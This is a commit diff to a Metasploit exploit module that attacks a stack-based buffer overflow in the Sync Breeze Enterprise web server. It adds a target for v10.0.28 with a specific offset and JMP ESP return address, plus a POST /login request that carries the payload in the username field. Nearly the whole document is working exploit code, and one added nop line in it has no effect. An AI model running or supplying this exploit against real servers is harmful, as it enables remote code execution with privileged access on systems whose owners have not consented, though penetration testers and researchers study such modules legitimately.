Sync Breeze HTTP Server v10.0.28 BOF

jakxx · jakxx · commit ef282ea15487 · 2017-10-09T13:50:24.000-04:00
Added support for v10.0.28 to Sync Breeze BOF module
diff --git a/modules/exploits/windows/http/syncbreeze_bof.rb b/modules/exploits/windows/http/syncbreeze_bof.rb
@@ -15,15 +15,17 @@ def initialize(info = {})
       'Name'           => 'Sync Breeze Enterprise GET Buffer Overflow',
       'Description'    => %q{
         This module exploits a stack-based buffer overflow vulnerability
-        in the web interface of Sync Breeze Enterprise v9.4.28, caused by
-        improper bounds checking of the request path in HTTP GET requests
+        in the web interface of Sync Breeze Enterprise v9.4.28 and v10.0.28, caused by
+        improper bounds checking of the request in HTTP GET and POST requests
         sent to the built-in web server. This module has been tested
         successfully on Windows 7 SP1 x86.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Daniel Teixeira'
+          'Daniel Teixeira',
+          'Andrew Smith', # MSF support for v10.0.28
+          'Owais Mehtab'  # Original v10.0.28 exploit
         ],
       'DefaultOptions' =>
         {
@@ -42,6 +44,12 @@ def initialize(info = {})
               'Offset' => 2488,
               'Ret'    => 0x10015fde  # POP # POP # RET [libspp.dll]
             }
+          ],
+          [ 'Sync Breeze Enterprise v10.0.28',
+            {
+              'Offset' => 780,
+              'Ret'    => 0x10090c83  # JMP ESP [libspp.dll]
+            }
           ]
         ],
       'Privileged'     => true,
@@ -59,7 +67,7 @@ def check
       version = res.body[/Sync Breeze Enterprise v[^<]*/]
       if version
         vprint_status("Version detected: #{version}")
-        if version =~ /9\.4\.28/
+        if version =~ /9\.4\.28/ or version =~ /10\.0\.28/
           return Exploit::CheckCode::Appears
         end
         return Exploit::CheckCode::Detected
@@ -74,29 +82,52 @@ def check
 
   def exploit
 
-    eggoptions = {
-      checksum: true,
-      eggtag: rand_text_alpha(4, payload_badchars)
-    }
+    case target.name
 
-    hunter, egg = generate_egghunter(
-      payload.encoded,
-      payload_badchars,
-      eggoptions
-    )
+    when 'Sync Breeze Enterprise v9.4.28'
+      eggoptions = {
+        checksum: true,
+        eggtag: rand_text_alpha(4, payload_badchars)
+      }
 
-    sploit =  rand_text_alpha(target['Offset'])
-    sploit << generate_seh_record(target.ret)
-    sploit << hunter
-    sploit << make_nops(10)
-    sploit << egg
-    sploit << rand_text_alpha(5500)
+      hunter, egg = generate_egghunter(
+        payload.encoded,
+        payload_badchars,
+        eggoptions
+      )
 
-    print_status('Sending request...')
+      sploit =  rand_text_alpha(target['Offset'])
+      sploit << generate_seh_record(target.ret)
+      sploit << hunter
+      sploit << make_nops(10)
+      sploit << egg
+      sploit << rand_text_alpha(5500)
 
-    send_request_cgi(
-      'method' => 'GET',
-      'uri'    => sploit
-    )
+      print_status('Sending request...')
+
+      send_request_cgi(
+        'method' => 'GET',
+        'uri'    => sploit
+      )
+
+    when 'Sync Breeze Enterprise v10.0.28'
+      uri = "/login"
+      sploit = rand_text_alpha(target['Offset'])
+      sploit << [target.ret].pack('V')
+      sploit << rand_text(4)
+      make_nops(10)
+      sploit << payload.encoded
+
+      print_status('Sending request...')
+
+      send_request_cgi(
+        'method' => 'POST',
+        'uri'    => uri,
+        'vars_post'     => {
+          'username' => "#{sploit}",
+          'password' => "rawr"
+        }
+      )
+    end
   end
 end
